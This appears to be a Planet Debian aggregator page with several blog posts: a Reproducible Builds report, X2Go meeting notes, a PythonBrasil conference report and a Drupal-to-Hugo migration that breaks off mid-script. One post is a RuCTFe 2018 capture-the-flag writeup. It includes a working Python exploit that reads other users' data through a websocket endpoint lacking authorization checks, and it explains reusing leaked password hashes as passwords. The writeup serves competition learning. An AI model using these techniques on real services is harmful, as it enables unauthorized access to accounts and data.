Planet Debian - https://planet.debian.org/

Visiting London

Wed, 14/11/2018 - 2:42pm

I'm visiting London for the rest of the week (November 14th–18th) to watch matches 5 and 6 of the Chess World Championship. If you're in the vicinity and want to say hi, drop me a note. :-)

Steinar H. Gunderson http://blog.sesse.net/ Steinar H. Gunderson

Alerts in Weblate to indicate problems with translations

Wed, 14/11/2018 - 2:15pm

The upcoming Weblate 3.3 will bring a new feature called alerts. This is a single place where you will see problems in your translations. Right now it mostly covers Weblate integration issues, but it will be extended in the future to deeper, translation-wide diagnostics.

This will help users better integrate Weblate into their development process by giving integration hints or highlighting problems Weblate has found in the translation. It will identify typical problems such as unmerged git repositories, parse errors in files, or duplicate translation files. You can read more on this feature in the Weblate documentation.

You can try this feature on Hosted Weblate right now; it will be part of the upcoming 3.3 release.

Filed under: Debian English SUSE Weblate

Michal Čihař https://blog.cihar.com/archives/debian/ Michal Čihař's Weblog, posts tagged by Debian

Reproducible Builds: Weekly report #185

Tue, 13/11/2018 - 2:56pm

Here’s what happened in the Reproducible Builds effort between Sunday November 4 and Saturday November 10 2018:

Packages reviewed and fixed, and bugs filed

diffoscope development

diffoscope is our in-depth “diff-on-steroids” utility which helps us diagnose reproducibility issues in packages. This week, version 105 was uploaded to Debian unstable by Mattia Rizzolo. It included contributions already covered in previous weeks as well as new ones from:

Website updates

There were a large number of changes to our website this week:

In addition to that we had contributions from Deb Nicholson, Chris Lamb, Georg Faerber, Holger Levsen and Mattia Rizzolo et al. on the press release regarding joining the Software Freedom Conservancy:

Test framework development

There were a large number of updates to our Jenkins-based testing framework that powers tests.reproducible-builds.org by Holger Levsen this week (see below). The most important work was done behind the scenes, outside of Git: a long debugging session to find out why the Jenkins Java processes were suddenly consuming all of the system resources whilst the machine was under a load of 60-200. This involved temporarily removing all 1,300 jobs, disabling plugins and making other changes. In the end, it turned out that the underlying SSH/HDD performance was configured poorly and, after this was fixed, Jenkins returned to normal.

In addition, Mattia Rizzolo fixed an issue in the web-based package rescheduling tool by encoding a string before passing it to subprocess.run, and fixed the parsing of the “issue” selector option.
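As a rough illustration of that kind of fix (a hypothetical sketch, not the rescheduling tool's actual code; the command and input below are made up), passing a str to subprocess.run without text mode fails, so the string is encoded first:

import subprocess

# Hypothetical example: "packages" stands in for form input typed into a
# web interface; the real tool's command line is different.
packages = "hello 2.10-2\nbash 5.0-1\n"

# Without text=True, subprocess.run() expects bytes on stdin, so the string
# is encoded explicitly before being passed in.
result = subprocess.run(["wc", "-l"], input=packages.encode("utf-8"),
                        capture_output=True)
print(result.stdout.decode().strip())  # prints "2"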

This week’s edition was written by Arnout Engelen, Bernhard M. Wiedemann, Chris Lamb, Holger Levsen, Oskar Wirga, Santiago Torres, Snahil Singh & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks https://reproducible-builds.org/blog/ reproducible-builds.org

Results produced while at "X2Go - The Gathering 2018" in Stuttgart

Mon, 12/11/2018 - 3:25pm

Over the last weekend, I attended the FLOSS meeting "X2Go - The Gathering 2018" [1]. The event took place at the shackspace maker space in Ulmerstraße in Stuttgart-Wangen (near the S-Bahn station S-Untertürkheim). Thanks to the people from shackspace for hosting us there; I highly enjoyed your location's environment. Thanks to everyone who joined us at the meeting. Thanks to all event sponsors (food + accommodation for me). Thanks to Stefan Baur for being our glorious and meticulous organizer!!!

Thanks to my family for letting me go for that weekend.

A special big thanks to everyone for letting me bring our family dog "Capichera" with me to the event. While Capichera adapted quite well to this special environment on sunny Friday and Saturday, he was not really feeling well on rainy Sunday (aching joints, unwilling to move, walk or interact).

For those interested, and especially for our event sponsors, below you can find a list of results produced in relation to the gathering.

light+love
Mike

2018-11-09 Mike Gabriel (train ride + @ X2Go Gathering 2018)
  • X2Go: Port x2godesktopsharing to Qt5.
  • Arctica: Release librda 0.0.2 (upstream) and upload librda 0.0.2-1 to Debian unstable (as NEW).
  • Arctica: PR reviews and merges:
  • Arctica: Fix autobuilders (add libxkbfile-dev locally to the build systems' list of packages, required for latest nx-libs with xkb-1.3.0.0 branch merged).
  • Arctica: Fix (IMAKE_)FONT_DEFINES build logic in nx-libs (together with Ulrich Sibiller)
  • X2Go: Explain X2Go Desktop Sharing to one of the event sponsors.
  • Discuss various W-I-P branches in nx-libs and check their development status with the co-maintainers.
  • Debian: Upload to stretch-backports: mate-tweak 18.10.2-1~bpo9+1.
  • Debian: Upload to stretch-backports: mate-icon-theme 1.20.2-1~bpo9+1.
2018-11-10 - Mike Gabriel (@ X2Go Gathering 2018)
  • my tool chain: make my smtp_tunnel script more robust and specific about which autossh tunnel to take down. Add "up" and "down" as first argument, so I can now also take down the autossh tunnel for SMTP (as opposed to doing killall autossh unspecifically). A rough sketch of such a helper follows after this list.
  • Talks:
    • Discussion Slot - more general NX-Libs discussion (BIG-REQUESTS, Xinerama, Telekinesis)
    • Demo: Arctica Greeter with X2Go Logon
    • Demo/Discussion: Current state of the Python Broker, Feature Requests
    • Discussion Slot - more general NX-Libs discussion (Software rendering, OpenGL, GLX, … how is that all related? And would we be able to speed things up in a Telekinesis-like approach somehow?)
  • Cooking: Prepare a nearly vegan (the carrots had butter), organic Italian pasta dish (with salad and ciabatta bread) for the group, together with Ritchi and Thomas. Much appreciation to plattsalat e.V. [2] for sponsoring the food.
  • PyHoca-CLI: Fix normal password authentication (i.e. for users that don't use SSH priv/pub keys).
  • Python X2Go / PyHoca-CLI: Add a check directly after authentication that verifies the remote server has the X2Go Server software installed; bail out with an error if it does not.
  • X2Go Consulting: Demo a possible approach for having X2Go in the web browser again to Martti Pikanen.
2018-11-11 - Mike Gabriel (@ X2Go Gathering 2018 + train ride)
  • Debian: Port pinentry-x2go to Qt5, upload to unstable pinentry-x2go 0.7.5.9-3.
  • X2Go: Apply changes on top of pinentry-x2go 0.7.5.10 upstream.
  • Talks:
    • Quick introduction to librda.
  • Debian: Upload to unstable: mate-polkit 1.20.1-2.
  • X2Go: Work on x2godesktopsharing upstream:
    • allow system-wide default settings
    • store sharing group in settings (instead of hard-coding a POSIX group name)
    • rewrite the access grant/deny dialog
  • Debian: Prepare Debian package for x2godesktopsharing.
    • debconf: make the sharing group name selectable
    • debconf: auto-start desktop sharing
    • debconf: auto-activate desktop sharing when started
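As a rough sketch of the smtp_tunnel idea mentioned under 2018-11-10 (a hypothetical reimplementation, not Mike's actual script; host name, port forward and the pkill pattern are all assumptions):

#!/usr/bin/env python3
"""Hypothetical smtp_tunnel-style helper: takes "up" or "down" as its first
argument and only touches the autossh process carrying the SMTP forward,
instead of running a blanket "killall autossh"."""
import os
import subprocess
import sys

TUNNEL_SPEC = "2525:localhost:25"   # assumed local forward for SMTP
REMOTE_HOST = "mail.example.org"    # assumed remote host

def up():
    # -f backgrounds autossh, -N skips running a remote command;
    # AUTOSSH_GATETIME=0 keeps autossh retrying even after a fast first failure.
    env = dict(os.environ, AUTOSSH_GATETIME="0")
    subprocess.run(["autossh", "-f", "-N", "-L", TUNNEL_SPEC, REMOTE_HOST],
                   check=True, env=env)

def down():
    # Match only the autossh instance with this forward spec on its command
    # line, so other autossh tunnels keep running.
    subprocess.run(["pkill", "-f", "autossh.*" + TUNNEL_SPEC], check=False)

if __name__ == "__main__":
    action = sys.argv[1] if len(sys.argv) > 1 else ""
    if action == "up":
        up()
    elif action == "down":
        down()
    else:
        sys.exit("usage: smtp_tunnel up|down")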
References

sunweaver http://sunweavers.net/blog/blog/1 sunweaver's blog

Review: The "Trojan Room" coffee

Mon, 12/11/2018 - 1:20pm

I was recently invited to give a seminar at Cambridge University's Department of Computer Science and Technology on the topic of Reproducible Builds.

Whilst it was an honour to have been asked, it also afforded an opportunity to drink coffee from the so-called "Trojan Room" which previously housed the fabled Computer Laboratory coffee pot:

For those unaware of the background: to save hackers in the building from finding the coffee machine empty, a camera was set up on the local network in 1991 using an Acorn Archimedes to capture a live 128×128 image of the pot, thus becoming the world's first webcam.

According to Quentin Stafford-Fraser, the technical limitations at the time did not matter:

The image was only updated about three times a minute, but that was fine because the pot filled rather slowly, and it was only greyscale, which was also fine, because so was the coffee.

Whilst the original pot was sold for £3,350 in 2001, what, you may ask, did I think of the coffee I sampled? Did the historical weight of the room imbue a certain impalpable quality into the beverage itself? Perhaps this modern hacker lore inspired deep intellectual thoughts in me? Did it infuse a superlative and indefinable depth of flavour that belied the coffee's quotidian origins…?

No, it did not.

(Thanks to Allison Randal for arranging this opportunity.)

Chris Lamb https://chris-lamb.co.uk/blog/category/planet-debian lamby: Items or syndication on Planet Debian.

Achievement unlocked! I spoke at PythonBrasil[14]

Mon, 12/11/2018 - 3:49am
PyLadies (and going to PythonBrasil)

PythonBrasil is the national Python community conference that happens every year, usually in October, in Brazil.

I attended PythonBrasil for the first time in 2016, the year we had started PyLadies Porto Alegre. Back then, we were a very small group and I was the only one to go. It was definitely one of the best experiences I ever had, which, of course, set a very high standard for every single tech event I attended afterwards.

Because of the great time I had there, I wanted to bring more and more women from PyLadies Porto Alegre to experience PythonBrasil in the following editions. So, during the PyLadies Porto Alegre 1st birthday party, I encouraged the other women to submit activities and to try to go to the conference, which would happen in Belo Horizonte.

When attending it for the second time, I didn't go alone. Daniela Petruzalek had her talk accepted. Claudia, also from PyLadies Porto Alegre, was able to go for the first time thanks to the support of the PyLadies Brazil crowdfunding campaign. To me, one of the most memorable things about this PythonBrasil was "The (unofficial) PyLadies House", where I stayed. It was a huge house that we rented and shared between about 18 people to help with the accommodation costs for all of us. We shared breakfasts and rides and stories. We watched other PyLadies rehearse their talks, gave lightning tech talks late at night and we even had a birthday party!

So, this year? The idea of encouraging PyLadies POA submissions, something that had come up almost spontaneously last year, matured, and we worked to make the PyLadies Porto Alegre 2nd Birthday Party an all-day event with that purpose. The schedule? Lightning talks about Python projects from its members, talks about experiences as participants and as speakers at Python Brasil and... we also had help from Vinta Software's Flavio Juvenal, who acted as a mentor to the women who were considering submitting an activity to PythonBrasil. He even made a great GitHub repo with a proposal checklist to assist us - and he made himself available to review the proposals we wrote.

The result? We had more than 6 women from PyLadies Porto Alegre with activities accepted to PythonBrasil[14]. Some of them even had more than one activity (tutorial and talk) accepted.

I was among the ones who had been accepted. Ever since attending the conference for the first time, it had been a goal of mine to give a talk at PythonBrasil. But not just any talk: I wanted it to be a technical talk. At last, what I learned during Outreachy and how I had used it for a real task in a job finally gave me the confidence to do so. I felt ready, so I submitted and I was accepted.

I made my way to Natal, the capital of the Rio Grande do Norte (RN) state (in the Northeast of Brazil), two days before the conference was to start, since it was the cheapest ticket I could find. Besides, PyLadiesBRConf was scheduled to happen on the day before and I was hoping I would be able to attend. PyLadiesBRConf was a full day of talks organized by what one could call "the original PyLadies Brazil", since the PyLadies community in Brazil actually started in Natal and was named simply that (afterwards we started naming the groups after their cities).

The PythonBrasil[14] conference

On the next day, PythonBrasil[14] started. It was the biggest PythonBrasil to happen yet, with over 700 attendees (plus staff). Like at many PyCons, the conference days were split between tutorials, talks and sprints.

Day 1 - tutorials

The tutorials have free admission and are open to anyone (whether they have bought a ticket to the conference or not). Unfortunately, due to the capacity of the rooms where they would be held, there was a limit of 100 registrations for each tutorial. When I went to register for the tutorials of the first day, they were already all booked. Even so, the tutorial I was most interested in, "Building REST APIs with Django REST Framework", had to be cancelled anyway because the presenter missed his flight. :( On this first day, I met with a few PyLadies and people from the Python community who were in Natal, walked on the beach and focused on the preparation for my talk.

Day 2 - tutorials

I must confess that I had registered for the tutorial on Pandas ("It's not witchcraft, it's Pandas", by Fernando Masanori) merely because Flavio Juvenal had mentioned Pandas in the feedback for my proposal. I had no idea what it was actually about or why one would even use Pandas. By noon on that second day, though, I was very glad that I did (and that I got a spot in it!). I learned a bit about Pandas and I also learned how to use Jupyter Notebooks, something I had never tried before either. I found both Pandas and Jupyter easy and interesting and I look forward to doing some projects using them.

Back when we (PyLadies) were discussing submissions to PythonBrasil with Professor Masanori, Data Structures was something that both I and another PyLady (Debora) had mentioned we had been meaning to focus on and study more. So, he came up with the idea for a tutorial about it, called: "Data Structures are <3".

In this tutorial, I found it quite interesting to learn and play with recursive functions and searching algorithms. I was quite impressed to learn about heapsort (who knew doing such a thing could be so cool?).

Image Licensed CC BY-SA 3.0 Attribution: RolandH
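For readers who have not met it before, the idea is small enough to sketch in a few lines of Python using the standard library's heapq module (just an illustration, not the tutorial's actual material):

import heapq

def heapsort(values):
    """Heapsort in its simplest 'push everything, pop everything' form."""
    heap = list(values)
    heapq.heapify(heap)  # O(n): rearrange the list into a binary min-heap
    # Each pop removes the smallest remaining element in O(log n).
    return [heapq.heappop(heap) for _ in range(len(heap))]

print(heapsort([5, 1, 4, 1, 5, 9, 2, 6]))  # [1, 1, 2, 4, 5, 5, 6, 9]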

Everything at PythonBrasil (tutorials, talks and sprint) happened in the same hotel. So, after the tutorials were over, I hung around with some of the people of the community who were staying at the same hostel. The organizing team asked for help in putting together the conference kit (bag, t-shirt, IDs and flyers). We made sort of a production line and cut the time considerably short for the volunteer team.

Afterwards, I was still processing everything that I had learned and I wanted to try out the new things, so I went back to the hostel to code some more. I confess that I was so hooked that I stayed up until 2 am to create the code with Pandas that I would incorporate in my talk as bonus content.

Day 3 - talks

On this day, I had the opportunity to meet and socialize with a lot of people who were coming to Python Brasil for the first time. It was particularly delightful to see a lot of students from a public technical school (Instituto Federal) attending the conference with their teachers. They had been given tickets, which allowed them to attend the (otherwise very expensive) conference and I must say that this is the kind of inclusion that I always want to see in tech events.

From the talks, I want to highlight these moments: I learned about Scrapy (which I have been playing around with a bit since then), I watched an awesome talk about using Python with Physics (although I don't have in-depth knowledge of Physics, I count it as a success that I could follow the talk in its entirety, so cheers to the presenter, Ana Maria, from PyLadies Teresina) and I must mention that I was quite impressed by Elias Dorneles' talk about developing software for the command line. Even his "slides" were made there - and there were drawings and music too, all made with Python and using the command line!

Day 4 - talks

The second day of talks brought us the much-needed talk about AfroPython, an initiative that was created to increase the representation of Black and native Brazilian people in our community.

A talk that gathered a lot of attention (and overcrowded the room it was being given in!) was the one about using Python to understand data about suicides in order to help prevent them. It's a hard subject for many people, but it is one that we definitely need to talk about.

Andreza Rocha's talk "Dear White People (from HR)" also touched a lot of people. She drew from her own experiences as a tech recruiter to question the homogeneity that we (still) have in tech. "Who are the ones who recruit the people?" she asked. "For us to be recruited, we (black people) have to be alive."

It was on this day that a violation of Python Brasil's Code of Conduct happened. After a PyLady gave her talk, a male participant used the time for questions not to ask a question, but to, let's say... eulogize the woman who had given the talk... by demeaning all the other women who had presented before her and weren't "technical enough" or something like that. Oh, how thick we must make our skin to be able to come up to a stage knowing we might be subjected to a moment like that... I am glad the PyLady was experienced and level-headed enough to own the moment and give him the comeback he deserved. * sigh * (After the conference, the organization published a note about the CoC violation.)

Contrary to popular belief, yes, I did watch the last keynote of the day, even though it was Facebook's. And it did surprise me. Rainer Alves spoke about the shifts in corporate culture that happened when they merged infrastructure and development people into a "Production Engineering" department. What I found most relevant, though, was the slide below, about "blameless postmortems". After all, how can one actually correct a malpractice or an error other than by working collectively to figure out the way? "It's not about what you did, it's about what went wrong."

This was the day we took the official photo of Python Brazil:

It was also the day we took a picture with the women who were at the conference:

Day 5 - talks

Sunday arrived and it was time for: 'But can you open it on Excel?' Exporting to TXT, CSV and JSON with Python ("'Mas dá pra abrir no Excel?'' Exportando para TXT, CSV e JSON com Python"). The focus of my talk was how to export data to those formats using mainly the tools offered by the Python Standard Library. But, as I mentioned before, thanks to what I learned during the PythonBrasil tutorials, I was able to add some extra content and show how the export to CSV could be done with Pandas as well. I was very glad about this, even though I felt like there was so little time to go over all the content I wanted to present (I had time to go through all my slides and for a very brief demonstration, but that was it). I think it went well. I even managed to speak briefly about Free Software (since I don't use Excel, and I made my demonstration with LibreOffice).
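A minimal sketch of the two approaches from the talk (made-up data, not the actual slides' example): the standard library's csv and json modules on one side, and the pandas one-liner shown as bonus content on the other:

import csv
import json

import pandas as pd

rows = [
    {"name": "Ada", "language": "Python"},
    {"name": "Grace", "language": "COBOL"},
]

# Standard library: csv.DictWriter and json.dump
with open("people.csv", "w", newline="") as f:
    writer = csv.DictWriter(f, fieldnames=["name", "language"])
    writer.writeheader()
    writer.writerows(rows)

with open("people.json", "w") as f:
    json.dump(rows, f, indent=2)

# The same CSV export done with pandas
pd.DataFrame(rows).to_csv("people_pandas.csv", index=False)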

When they opened the time for questions, I explicitly said "Questions, not comments, please", hoping to avoid mansplaining or another incident like the one that had happened the day before. And I know people judged me for that, but... I am also aware they judged me more harshly because I am a woman. After all, in previous editions we have had male keynote speakers making the very same comment without people being offended by it.

This did not stop people from coming to talk to me afterwards with comments about their experiences anyway - and that was definitely better, because I felt like I could talk to them more properly and personally about it, having more time than the 5 minutes allotted to questions and not having to answer under a full audience's scrutiny.

Other than my own talk, I would like to mention some other talks I attended. There was a talk about advanced functional programming ("Going further than map, filter and reduce"), which is something that I find interesting to have some idea about, even though I don't quite fully grasp it yet. There was also the PyLadies' talk, where a group representing each region of Brazil with a PyLadies group talked about the work we have been doing. Andressa represented PyLadies Porto Alegre and talked about all the work we have been doing, in particular regarding all the Django Girls workshops we have helped at in Rio Grande do Sul since the last PythonBrasil.

Ana Paula gave a fun talk about genetic algorithms with Python, using the language to work with biology data. Another subject that I am not very familiar with, but that I found quite interesting. And I also saw Camilla Martins live coding to run Python with Node.js on the big stage.

During the lightning talks, something amazing happened: the Instituto Federal students went up on stage and talked about their experience at PythonBrasil using a regional form of sung poetry called Cordel. It was really remarkable.

Also during the lightning talks, we had Thrycia Oliveira, a former participant of Django Girls, calling attention to the fact that we need to have spaces in the community that are inclusive to parents, in particular to moms. She said that the PythonBrasil organization had tried to arrange this, and she thanked them for that, but it had not been possible. I also remember when she told me about her participation in Python Nordeste (a regional conference that preceded PythonBrasil) and how she and her husband had to alternate the days they attended, because one of them had to stay at home to watch over their kids (it wasn't really a kids-inclusive event).

This day ended with Betina's keynote "Does this algorithm have a soul?", a very relevant question for the state of software development today. Her talk spoke to me and to a lot of people in the audience, and I can't picture a more welcoming community for it to have been given to.

Day 6 - sprints

Sadly, Python Brazil had to come to an end. Day 6 happened on a Monday, and that meant that the majority of the people, including almost all the PyLadies, had already returned home. :( For personal reasons that I would rather not talk about publicly, I chose not to take part in the coding sprint to help with APyB's site. Instead, because I am looking for work, I used this day mostly for networking and applying to jobs I had heard about during PythonBrasil. I don't have wifi at home and I need to take any opportunity I can get to use the internet to send CVs and take technical tests, so that is what I did.

Wrapping things up...

And, of course, to finish this post I ought to mention the beach... On my last two days in Natal, I was gifted with the awesomeness that is the ocean at Ponta Negra during the full moon. There are no words to describe the beauty of it (I am sorry I couldn't take a good picture of it).

Thank you notes

I know this post ended up being extensive, but how can one summarize an experience with an event as huge as PythonBrasil? It's hard. I think it's safe to say that being part of something like that has a lasting impact on my life. All the technical content I heard about gives me motivation to keep studying and learning new things. All the people I have met, friends old and new, give meaning to the work to make the Python community more open and inclusive.

So, I cannot thank Outreachy enough for making my participation in Python Brasil possible!

This whole journey would not be possible without the awesome people below, so I would like to also thank:

  • My Outreachy mentors Daniel Pocock and Bruno for the support during the internship and beyond
  • Flavio Juvenal for the feedback on my proposal and giving the golden tip about Pandas
  • Andreza Rocha for not letting me give up on my dream to go to this PythonBrasil
  • Felipe de Morais and Betina Costa for sitting in the very front row and nodding when I was unsure during my talk
  • Elias Dorneles for the support when applying to Outreachy and for reviewing my slides
  • PyLadies Brazil for being the safety net so many women can rely on
Renata https://rsip22.github.io/blog/ Renata's blog

RuCTFe 2018 laberator

Sun, 11/11/2018 - 4:33pm

Team: FAUST
Crew: izibi, siccegge
CTF: RuCTFe 2018

The service

A web service written in Go. It has some pretty standard functionality (register, login, store a string), with the logic somewhat dispersed between the main webserver in main.go, some stuff in the templates, and the websockets endpoint in command_executor.go. Obviously you have to extract the strings ("labels") from the gameserver. The phrase stored when creating the account was also used to store some more flags.

Client side authentication for labels

A gem from the viewLabel JavaScript function: for some reason the label's owner is checked client-side, after the data has already been returned to the client.

let label = JSON.parse(e.data);
if (label.Owner !== getLoginFromCookies()) {
    return;
}

And indeed, the websocket view method checks for some valid session but doesn't concern itself with any further validation of access privileges. As long as you have any valid session and can figure out websockets, you can get just about any label you like.

"view": func(ex *CommandExecutor, data []byte) ([]byte, error) { var viewData ViewData err := json.Unmarshal(data, &viewData) if err != nil { return nil, createUnmarshallingError(err, data) } cookies := parseCookies(viewData.RawCookies) ok, _ := ex.sm.ValidateSession(cookies) if !ok { return nil, errors.New("invalid session") } label, err := ex.dbApi.ViewLabel(viewData.LabelId) if err != nil { return nil, errors.New(fmt.Sprintf("db request error: %v, labelId=(%v)", err.Error(), viewData.LabelId)) } rawLabel, err := json.Marshal(*label) if err != nil { return nil, errors.New(fmt.Sprintf("marshalling error: %v, label=(%v)", err.Error(), *label)) } return rawLabel, nil },

Putting things together: the exploit creates a fresh account, generates a label (to figure out the ID of the most recent labels) and then bulk-loads the last 100 labels.

#!/usr/bin/env python3
import requests
import websocket
import json
import sys
import string
import random
import base64

def main():
    host = sys.argv[1]
    session = requests.session()
    password = [i for i in string.ascii_letters]
    random.shuffle(password)
    username = ''.join(password[:10])
    phrase = base64.b64encode((''.join(password[10:20])).encode()).decode()
    password = base64.b64encode((''.join(password[20:36])).encode()).decode()
    x = session.get('http://%s:8888/register?login=%s&phrase=%s&password=%s' % (host,username,phrase,password))
    x = session.get('http://%s:8888/login?login=%s&password=%s' % (host,username, password))
    raw_cookie = 'login=%s;sid=%s' % (x.cookies['login'], x.cookies['sid'])
    ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,))
    data = {'Text': 'test', 'Font': 'Arial', 'Size': 20, 'RawCookies': raw_cookie}
    ws.send(json.dumps({"Command": "create", "Data": json.dumps(data)}))
    # make sure create is already committed before continuing
    ws.recv()
    data = {'Offset': 0, 'RawCookies': raw_cookie}
    ws.send(json.dumps({"Command": "list", "Data": json.dumps(data)}))
    stuff = json.loads(ws.recv())
    lastid = stuff[0]['ID']
    for i in range(0 if lastid-100 < 0 else lastid-100, lastid):
        ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,))
        try:
            data = {'LabelId': i, 'RawCookies': raw_cookie}
            ws.send(json.dumps({"Command": "view", "Data": json.dumps(data)}))
            print(json.loads(ws.recv())["Text"])
        except Exception:
            pass

if __name__ == '__main__':
    main()

Password Hash

The hash module used is obviously suspect. It consists of a binary and a wrapper, freshly uploaded to GitHub just the day before. Also, if you create a test account with a short password (say, test), you end up with a hash that contains the password in plain (say, testTi\x02mH\x91\x96U\\I\x8a\xdd). Looking closer, if you register with a password that is exactly 16 characters (aaaaaaaaaaaaaaaa), you end up with a 16-character hash that is identical to it. This also means the password hash is a valid password for the account.

Listening with tcpdump for a while, you'll notice interesting entries:

[{"ID":2,"Login":"test","PasswordHash":"dGVzdFRpAm1IkZZVXEmK3Q==","Phrase":{"ID":0,"Value":""}}]

See the password hash there? Turns out this comes from the regularly scheduled last_users websocket call.
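You can check the observation about the hash format directly against that capture; decoding the base64 value shows it starts with the plaintext password:

import base64

leaked = "dGVzdFRpAm1IkZZVXEmK3Q=="      # PasswordHash from the capture above
decoded = base64.b64decode(leaked)
print(decoded)                            # b'testTi\x02mH\x91\x96U\\I\x8a\xdd'
print(decoded.startswith(b"test"))        # True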

"last_users": func(ex *CommandExecutor, _ []byte) ([]byte, error) { users := ex.dbApi.GetLastUsers() rawUsers, err := json.Marshal(*users) if err != nil { return nil, errors.New(fmt.Sprintf("marshalling error: %v, users=(%v)", err.Error(), *users)) } return rawUsers, nil },

So call last_users (it doesn't even need a session), log in as each of the last 20 users, and just load all their labels. Good thing passwords are transferred base64-encoded, so there is no worrying about non-printable characters in the password hash.
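A rough sketch of that second exploit (endpoints and command names are taken from the writeup above, but details such as the empty last_users payload and the reconnect-per-view loop are guesses, not the team's actual script):

#!/usr/bin/env python3
import json
import sys

import requests
import websocket

host = sys.argv[1]

# last_users does not require a session at all.
ws = websocket.create_connection('ws://%s:8888/cmdexec' % host)
ws.send(json.dumps({"Command": "last_users", "Data": ""}))
users = json.loads(ws.recv())

for user in users:
    # The base64 "hash" is accepted as the password itself; requests takes
    # care of URL-encoding the +, / and = characters it may contain.
    r = requests.get('http://%s:8888/login' % host,
                     params={'login': user['Login'],
                             'password': user['PasswordHash']})
    if 'sid' not in r.cookies:
        continue
    raw_cookie = 'login=%s;sid=%s' % (r.cookies['login'], r.cookies['sid'])

    # List the victim's labels, then view each one to get the stored text.
    ws = websocket.create_connection('ws://%s:8888/cmdexec' % host)
    ws.send(json.dumps({"Command": "list",
                        "Data": json.dumps({'Offset': 0,
                                            'RawCookies': raw_cookie})}))
    for entry in json.loads(ws.recv()):
        view_ws = websocket.create_connection('ws://%s:8888/cmdexec' % host)
        view_ws.send(json.dumps({"Command": "view",
                                 "Data": json.dumps({'LabelId': entry['ID'],
                                                     'RawCookies': raw_cookie})}))
        print(user['Login'], json.loads(view_ws.recv()).get('Text'))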

Additionally, sessions were generated with the broken hash implementation. This probably would have made it possible to compute session IDs.

Christoph Egger https://weblog.christoph-egger.org/ Christoph's last Weblog entries

Migrating from Drupal to Hugo

Sun, 11/11/2018 - 12:30pm
TL;DR: Migrating my website from Drupal 7 to Hugo

Jump directly to the end titled Migration to Hugo

Initial website

Looking back at my website's history, the domain was first registered sometime in 2003. Back then, it was mostly a couple of HTML pages. Being (still) a novice in web matters, my website was mostly built on ideas from others. IIRC, for the bare HTML one, I took a lot of the look-and-feel details from Miss Garrels' website.

First blog

My initial blog was self-hosted with blogging software written in PHP, named PivotX. The website for it still works, so hopefully the project is still alive. It was a pretty good tool for the purpose: very lean, with support for data backends in both MySQL and flat files. The latter was important to me, as I wanted to keep it simple.

Drupal

My first interaction with Drupal was with its WSOD. That was it until I revisited it when evaluating different FOSS web tools to build a community site for one of my previous employers.

Back then, we tried multiple tools: Jive, Joomla, WordPress and many more, but finally settled on Drupal. The requirement was to have something which would filter content under nested categories. Of the many things we tried, the only one which seemed able to do it was Drupal, with its Taxonomy feature, along with a couple of community-driven add-on modules.

We built it, but there were other challenges. It was hard to find people who were good with Drupal. I remember interviewing around 10-15 people who could take over the web portal and maintain it, and still not being able to fill the position. Eventually, I ended up maintaining the portal myself.

Migrating my website to Drupal

The easiest way to deal with the maintenance was to have one more live portal running Drupal. My website, which back then had ambitious goals to also serve an online shopping cart, was the perfect candidate. So I migrated my website from PivotX to Drupal 6. Drupal had a nice RSS Import module which was able to pull in most of the content, except the comments on each article. I think that is more a limitation of RSS feeds, but importing content through RSS feeds was the only data import path I could find back then.

Initially, Drupal looked like a nice tool. Lots of features and a vibrant community made it very appealing. And I had always wanted to build some skills hands-on (that's how the job market likes it; irrespective of the skills, it is the hands-on experience that they evaluate) by using Drupal both at the employer's community portal and on my personal website.

Little did I know that running/maintaining a website is one thing, whereas extending it is another (mostly expensive) affair.

Drupal 7

That was the first blow. For a project serving as a platform, Drupal was a PITA when dealing with migrations. And I'm not talking about migrations to a different platform, but rather an upgrade from one major release to another.

Having been using Debian for quite some time, this approach from Drupal brought back memories of the past, of using the Red Hat Linux and SuSE Linux distributions, where upgrades were not a common thing and, with every major release of the distribution, people were mostly recommended to re-install.

Similar was the case with Drupal. Every major release, many (core) modules would be dropped. Many add-on modules would lose support. Neither the project nor the community around it was helpful anymore.

But somehow, I eventually upgraded to Drupal 7. I did lose a lot of functionality. My nested taxonomy was gone and my themes were all broken. For the web novice that I am, it took me some time to fix those issues.

But the tipping point came with Drupal 8. It took the pain to the next level, repeating the same process of dropping modules and breaking functionality; I never heard much about backward compatibility on this platform.

Hugo

For quite some time I kept looking for a migration path away from Drupal 7. I did not care what it was as long as it was FOSS and had an active community around it. The immediate first choice was WordPress. By this time, my web requirements had been trimmed down. I no longer had outrageous ideas of building all solutions (web, blog, cart) on a single platform. All I did was mostly blog, plus a couple of basic pages.

The biggest problem was migration. WP has a module that does migration, but, for whatever annoying reason, the free version of it would only pick 7 articles from the total. And it did not import comments. So with WP I would still be prone to the same annoyances, given my limitations with web technologies. This migration path did not enthuse me much; it reminded me of a Hindi idiom: आसमान से गिरे और खजूर में अटके (roughly, "out of the frying pan, into the fire").

I also tried Jekyll and Hugo. My limited initial attempts were disappointing. Jekyll had an import module which, IIRC, did not work properly. Similar was the case with Hugo, which has a tool listed on its migration page, drupal2hugo, that was a disappointment right from the start.

With nothing much left, I just kept postponing my (desperate) plans to migrate.

Migration to Hugo

Luckily, I found a kind soul sharing migration scripts to help migrate from Drupal 7 to Hugo. Not everything could be migrated (I had to let go of the comments), but I was not in a position to wait any longer.

With very minimal changes to adapt it to my particular setup, I was able to migrate most of my content. Now, my website is running on Markdown rendered with Hugo. More than the tool, I am happy to have the data available in a much more standard format.

If there’s one thing that I’m missing on my website, it is mostly the commenting system. I would love to have a simple way to accept user comments integrated into Hugo itself, which would just append those comments to their respective posts. Hopefully soon, when I have (some more) free time.

<?php
define('DRUPAL_ROOT', __DIR__);
include_once(DRUPAL_ROOT . '/includes/bootstrap.inc');
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);

$nids = db_query('SELECT DISTINCT(nid) FROM {node}')->fetchCol();
$nodes = node_load_multiple($nids);

foreach ($nodes as $node) {
    $front_matter = array(
        'title' => $node->title,
        'date' => date('c', $node->created),
        'lastmod' => date('c', $node->changed),
        'draft' => 'false',
    );
    if (count($node->taxonomy_vocabulary_2[LANGUAGE_NONE])) {
        $tags = taxonomy_term_load_multiple(
            array_column($node->taxonomy_vocabulary_2[LANGUAGE_NONE], 'tid')
        );
        $front_matter['tags'] = array_column($tags, 'name');
    }
    if (count($node->taxonomy_vocabulary_1[LANGUAGE_NONE])) {
        $cat = taxonomy_term_load_multiple(
            array_column($node->taxonomy_vocabulary_1[LANGUAGE_NONE], 'tid')
        );
        $front_matter['categories'] = array_column($cat, 'name');
